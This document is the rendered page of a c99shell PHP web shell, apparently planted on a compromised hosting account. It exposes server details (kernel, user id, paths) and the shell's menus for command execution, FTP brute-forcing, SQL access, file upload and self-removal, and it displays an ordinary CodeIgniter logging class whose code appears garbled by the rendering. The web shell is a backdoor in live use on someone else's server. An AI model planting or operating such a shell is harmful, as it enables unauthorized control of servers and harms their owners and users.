smsonayla.org - c99shell

!C99Shell v.2.1 [PHP 7 Update] [1.12.2019]!

Software: LiteSpeed. PHP/7.4.33 

uname -a: Linux server704.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13
UTC 2025 x86_64
 

uid=1309(necipbey) gid=1314(necipbey) groups=1314(necipbey) 

Safe-mode: OFF (not secure)

/home/necipbey/public_html/system/Log/Handlers/   drwxr-xr-x
Free 3429.4 GB of 4265.01 GB (80.41%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     FileHandler.php (3.23 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

/**
 * This file is part of CodeIgniter 4 framework.
 *
 * (c) CodeIgniter Foundation <admin@codeigniter.com>
 *
 * For the full copyright and license information, please view
 * the LICENSE file that was distributed with this source code.
 */

namespace CodeIgniter\Log\Handlers;

use 
DateTime;
use 
Exception;

/**
 * Log error messages to file system
 */
class FileHandler extends BaseHandler
{
    
/**
     * Folder to hold logs
     *
     * @var string
     */
    
protected $path;

    
/**
     * Extension to use for log files
     *
     * @var string
     */
    
protected $fileExtension;

    
/**
     * Permissions for new log files
     *
     * @var int
     */
    
protected $filePermissions;

    
/**
     * Constructor
     */
    
public function __construct(array $config = [])
    {
        
parent::__construct($config);

        
$this->path = empty($config['path']) ? WRITEPATH 'logs/' $config['path'];

        
$this->fileExtension = empty($config['fileExtension']) ? 'log' $config['fileExtension'];
        
$this->fileExtension ltrim($this->fileExtension'.');

        
$this->filePermissions $config['filePermissions'] ?? 0644;
    }

    
/**
     * Handles logging the message.
     * If the handler returns false, then execution of handlers
     * will stop. Any handlers that have not run, yet, will not
     * be run.
     *
     * @param string $level
     * @param string $message
     *
     * @throws Exception
     */
    
public function handle($level$message): bool
    
{
        
$filepath $this->path 'log-' date('Y-m-d') . '.' $this->fileExtension;

        
$msg '';

        if (! 
is_file($filepath)) {
            
$newfile true;

            
// Only add protection to php files
            
if ($this->fileExtension === 'php') {
                
$msg .= "<?php defined('SYSTEMPATH') || exit('No direct script access allowed'); ?>\n\n";
            }
        }

        if (! 
$fp = @fopen($filepath'ab')) {
            return 
false;
        }

        
// Instantiating DateTime with microseconds appended to initial date is needed for proper support of this format
        
if (strpos($this->dateFormat'u') !== false) {
            
$microtimeFull  microtime(true);
            
$microtimeShort sprintf('%06d', ($microtimeFull floor($microtimeFull)) * 1_000_000);
            
$date           = new DateTime(date('Y-m-d H:i:s.' $microtimeShort, (int) $microtimeFull));
            
$date           $date->format($this->dateFormat);
        } else {
            
$date date($this->dateFormat);
        }

        
$msg .= strtoupper($level) . ' - ' $date ' --> ' $message "\n";

        
flock($fpLOCK_EX);

        
$result null;

        for (
$written 0$length strlen($msg); $written $length$written += $result) {
            if ((
$result fwrite($fpsubstr($msg$written))) === false) {
                
// if we get this far, we'll never see this during travis-ci
                // @codeCoverageIgnoreStart
                
break;
                
// @codeCoverageIgnoreEnd
            
}
        }

        
flock($fpLOCK_UN);
        
fclose($fp);

        if (isset(
$newfile) && $newfile === true) {
            
chmod($filepath$this->filePermissions);
        }

        return 
is_int($result);
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v.2.1 [PHP 7 Update] [1.12.2019] maintained by KaizenLouie and updated by cermmik | C99Shell Github (MySQL update) | Generation time: 0.0067 ]--